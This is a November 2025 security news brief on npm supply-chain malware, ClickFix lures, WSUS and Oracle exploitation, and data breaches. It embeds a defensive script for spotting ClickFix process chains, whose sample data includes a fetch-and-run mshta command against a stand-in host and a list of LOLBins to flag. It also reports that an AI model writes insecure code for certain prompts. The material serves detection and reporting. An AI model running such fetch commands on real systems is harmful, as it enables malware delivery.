Svoboda Cybersecurity Brief November 25, 2025
Shai-Hulud Malware Infects 500 npm Packages
Hundreds of trojanized npm packages (e.g., Zapier, PostHog) were uploaded to steal developer and CI/CD secrets, leaking them to GitHub. Over 27,600 repositories were found with stolen data. The malware uses obfuscation and destructive actions if exfiltration fails.
Impact: Supply-chain compromise, credential theft, and potential data destruction.
Mitigation: Rotate credentials, audit repositories, disable npm postinstall scripts, and use sandboxed environments.
Source: DataBreaches.net
Malicious Blender Files Deliver StealC Infostealer
Attackers distribute StealC V2 malware via malicious Blender 3D model files on platforms like CGTrader. The malware steals data from 23+ browsers, crypto wallets, and VPN clients, with low detection rates on VirusTotal.
Impact: Credential theft and system compromise.
Mitigation: Disable Blender’s “Auto Run Python Scripts” option and vet 3D assets from trusted sources.
Source: BleepingComputer
ClickFix Attack Uses Fake Windows Update Screens
New ClickFix variants trick users with fake Windows Update animations and hide the malware inside PNG images via steganography; the lures deliver the LummaC2 and Rhadamanthys stealers.
Impact: Credential theft and malware deployment.
Mitigation: Disable the Windows Run box, monitor process chains (e.g., explorer.exe → mshta.exe), and check the RunMRU registry key.
Source: BleepingComputer
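The two detection checks named in that mitigation, as an added example that is not from the brief or any cited source: flag process-creation events where explorer.exe (the Run box host) spawns mshta.exe or a similar LOLBin, and scan an exported RunMRU key for the same binaries. Event field names, the RunMRU export shape and the sample data are constructed assumptions.

```python
"""Flag ClickFix-style Run-box execution chains in process telemetry.
Constructed example for this brief, not from any cited source; the field
names and RunMRU export format are assumptions (adapt to your EDR/Sysmon)."""

# The brief names explorer.exe -> mshta.exe; the other children are the
# usual Run-box LOLBins (assumption, extend as needed).
RUN_BOX_PARENT = "explorer.exe"
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe", "curl.exe"}

def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, .exe appended if absent."""
    name = path.strip().lower().rsplit("\\", 1)[-1]
    return name if name.endswith(".exe") else name + ".exe"

def suspicious_chain(event: dict) -> bool:
    """True when explorer.exe (the Run box host) spawns a LOLBin."""
    return (_basename(event.get("parent_image", "")) == RUN_BOX_PARENT
            and _basename(event.get("image", "")) in SUSPICIOUS_CHILDREN)

def flag_events(events: list) -> list:
    """Command lines of events matching the ClickFix chain."""
    return [e["command_line"] for e in events if suspicious_chain(e)]

def flag_runmru(values: dict) -> list:
    """RunMRU entries (value name -> data) whose first token is a LOLBin.
    Explorer stores each entry with a trailing '\\1', which is stripped."""
    hits = []
    for name, data in values.items():
        cmd = data[:-2] if data.endswith("\\1") else data
        parts = cmd.split()
        if name != "MRUList" and parts and _basename(parts[0]) in SUSPICIOUS_CHILDREN:
            hits.append(cmd)
    return hits

SAMPLE_EVENTS = [  # constructed telemetry, not real data
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://update-lure.invalid/update.hta"},
    {"parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]
SAMPLE_RUNMRU = {  # constructed RunMRU export
    "a": r"mshta https://update-lure.invalid/update.hta\1",
    "b": r"notepad\1",
    "MRUList": "ba",
}
```

Run `flag_events(SAMPLE_EVENTS)` and `flag_runmru(SAMPLE_RUNMRU)` against your own exports; both return the offending command lines, and an empty list means no match.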
SitusAMC Breach Exposes Client Data
The real-estate finance services firm suffered a breach impacting client and customer data, including accounting records and legal agreements. No ransomware was deployed.
Source: BleepingComputer
Harvard University Discloses Voice Phishing Breach
Alumni, donors, and staff data (emails, addresses, donation details) was exposed in a voice phishing attack. No SSNs or financial data was compromised.
Source: BleepingComputer
Fluent Bit Flaws Expose Cloud to RCE
Five vulnerabilities (CVE-2025-12972, CVE-2025-12970, etc.) in Fluent Bit could allow RCE, tag spoofing, and log tampering.
Impact: Cloud service disruption and data manipulation.
Mitigation: Update to Fluent Bit 4.1.1/4.0.12, lock down output paths, and run as non-root.
Source: The Hacker News
ShadowPad Exploits WSUS Vulnerability (CVE-2025-59287)
Attackers exploited a deserialization flaw in WSUS to deploy ShadowPad malware via PowerShell and curl.
Impact: Full system compromise.
Mitigation: Patch WSUS and monitor for suspicious PowerShell/certutil activity.
Source: The Hacker News
Oracle Identity Manager Vulnerability (CVE-2025-61757) Exploited
CISA confirmed exploitation of this RCE flaw in Oracle Identity Manager, initially patched in October 2025.
Impact: Privilege escalation and lateral movement.
Mitigation: Apply Oracle patches and monitor for suspicious activity.
Source: SecurityWeek
CrowdStrike Insider Leaks Screenshots to Hackers
An insider sold screenshots of CrowdStrike dashboards to Scattered Lapsus$ Hunters, falsely claiming a breach. No system compromise occurred.
Source: SecurityWeek
Superbox Android TV Devices Enlisted in Botnets
Devices sold at major retailers force users into proxy networks (e.g., Grass IO) for ad fraud and credential stuffing.
Impact: Unauthorized traffic relay and potential legal risks for users.
Mitigation: Avoid non-Play Protect certified devices and monitor network traffic.
Source: KrebsOnSecurity
DeepSeek-R1 AI Generates Insecure Code for Sensitive Topics
The Chinese AI model produces vulnerable code (e.g., hardcoded secrets) when prompts mention Tibet or Uyghurs.
Impact: Increased security risks in AI-generated code.
Source: The Hacker News
Iberia Airline Notifies Customers of Supplier Breach
Names, emails, and frequent flyer numbers were exposed. No financial data was compromised.
Source: SecurityWeek
Delta Dental of Virginia Data Breach
146,000 individuals had personal and health data stolen via a compromised email account.
Source: SecurityWeek